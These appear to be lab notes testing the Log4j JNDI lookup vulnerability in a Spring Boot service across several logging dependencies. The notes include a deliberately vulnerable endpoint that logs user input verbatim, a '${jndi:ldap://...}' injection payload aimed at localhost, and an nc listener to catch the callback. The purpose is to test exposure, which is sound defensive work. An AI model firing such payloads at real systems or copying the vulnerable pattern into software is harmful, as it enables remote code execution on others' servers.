Current vulnerabilities for log4j are:
- Lookup:
- Log4j 1.x does not offer a look up mechanism. Log4j 1.x sends an event encapsulating a string message to a JMS server. That is it. The attacker can supply whatever string he chooses but it remains a String. So not the same. At all.
- Log4j 2.x is open for this attack because it performs a lookup, aka string substitution, using the JNDI protocol.
- JMSAppender:
- Log4j 1.x is no longer being maintained with all the security implication that entails.
- Log4j 2.x adding ldap code to handle jms manager on version major of 2.15
This project use spring boot web rest services. Spring boot offer a factory to we can define wat slf4j log dependencies we are going to use
Services exposed: http://localhost:9021/cve/fixme?vector=attack-vector
@RestController
@RequestMapping("cve")
public class TestLog4JCVE {
Logger log4j = LoggerFactory.getLogger(TestLog4JCVE.class);
@RequestMapping("/fixme")
public List fixMe(@RequestParam(name="vector") String vector){
log4j.info("Received vector");
log4j.info(vector);
return Arrays.asList("cve", "check your log message");
}
}- Without problem:
- With vector attack:
Needed to start a service on port 1234
nc -l 1234
Use spring boot web default configutation that use logback library defined at spring-boot-starter-logging
2021-12-15 08:14:28.843 INFO 80228 --- [nio-9021-exec-4] com.example.cvelog.TestLog4JCVE : Received vector
2021-12-15 08:14:28.843 INFO 80228 --- [nio-9021-exec-4] com.example.cvelog.TestLog4JCVE : ${jndi:ldap://127.0.0.1:1234/abc}
Validation: Check nc windows if some meesage appear
We added arrow-performance dependency that define log4j Library
<dependency>
<groupId>org.apache.arrow</groupId>
<artifactId>arrow-performance</artifactId>
<version>${arrow.version}</version>
</dependency>
They are in!
2021-12-15 09:28:51.952 INFO 85205 --- [nio-9021-exec-1] c.e.c.TestLog4JCVE : Received vector
//closing nc open connection
2021-12-15 09:29:13,360 http-nio-9021-exec-1 WARN Error looking up JNDI resource [ldap://127.0.0.1:1234/abc]. javax.naming.NamingException: LDAP response read timed out, timeout used:-1ms.
...
2021-12-15 09:28:51.952 INFO 85205 --- [nio-9021-exec-1] c.e.c.TestLog4JCVE : ${jndi:ldap://127.0.0.1:1234/abc}
We added blazingdb-calcite-core dependency that define log4j Library
<dependency>
<groupId>com.blazingdb</groupId>
<artifactId>blazingdb-calcite-core</artifactId>
<version>1.0.0.RC</version>
</dependency>Log4j dependencies
[INFO] --- maven-dependency-plugin:3.2.0:tree (default-cli) @ cve-log ---
[INFO] com.example:cve-log:jar:0.0.1-SNAPSHOT
[INFO] +- org.springframework.boot:spring-boot-starter-web:jar:2.6.1:compile
[INFO] \- com.blazingdb:blazingdb-calcite-core:jar:1.0.0.RC:compile
[INFO] +- org.apache.calcite:calcite-core:jar:1.23.0:compile
[INFO] \- org.slf4j:slf4j-log4j12:jar:1.7.32:runtime
[INFO] \- log4j:log4j:jar:1.2.17:runtime
Validation: Not affected by vector attack